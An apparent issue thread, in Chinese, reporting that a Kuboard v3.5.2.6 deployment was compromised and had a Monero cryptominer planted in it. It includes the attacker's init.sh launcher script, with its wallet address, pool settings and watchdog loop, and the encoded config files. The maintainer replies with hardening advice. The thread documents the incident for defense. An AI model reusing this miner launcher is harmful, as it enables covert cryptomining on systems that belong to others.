V3版本有漏洞，被人植入了挖矿

[lyitt1987]

由于没做访问控制，被植入了挖矿程序

kuboard版本：v3.5.2.6

挖矿镜像：xmriger/jenkins:nano

运行的挖矿pod

挖矿pod里面的进程

提前的相关文件内容 `/app # cat apiSslMixConfig.json { "api_url": "gCHFYaVzdxeCN9xmqGx2FYcp", "base_server_address": "gCHFYaVzdxeCN9xmqG90FoAv", "app_name": "" /app # cat init.sh

!/bin/bash

export POOL=127.0.0.1:9443 export WALLET=43p8AgGKbhH198j4aTvwMb42PwT6Mc1qzYm7Bxg4y4DTESJtGAvzgGePtwqudFmz7RCi29fwkuG4ZLgxmmQzN8joADCEv9S docker_pid=$(pgrep -f "/app/docker --url=$POOL") if [ -z "$docker_pid" ]; then /app/docker --url=$POOL --donate-level=0 --user=$WALLET --pass=sslmix -k --coin monero > /dev/null 2>&1 & docker_pid=$! fi run_pid=$(pgrep -f "/app/run") if [ -z "$run_pid" ]; then /app/run > /dev/null 2>&1 & run_pid=$! fi while true do if ! ps | grep -q "[ ]$docker_pid " then kill $run_pid break fi if ! ps | grep -q "[ ]$run_pid " then /app/run > /dev/null 2>&1 & run_pid=$! fi if ! ps aux | grep '[{]sslmix[}] 1 2' > /dev/null then kill $run_pid break fi

sleep 30

done /app # cat localConfig.json { "local_port_and_address": null, "app_name": "", "notify_text": "", "uuid": "1715392212023552473" }/app # `

[trockxi]

请问3.5.2.7版本有修复这个吗？

[jason-kb]

Kuboard 没有这个漏洞，你安装 Kuboard 后，建议：

1. 修改密码，不要仍然使用默认密码
2. 开启双因子认证
3. 不要向公网开放 Kuboard 界面
4. 严防内鬼，避免内部人员使用公司服务器挖矿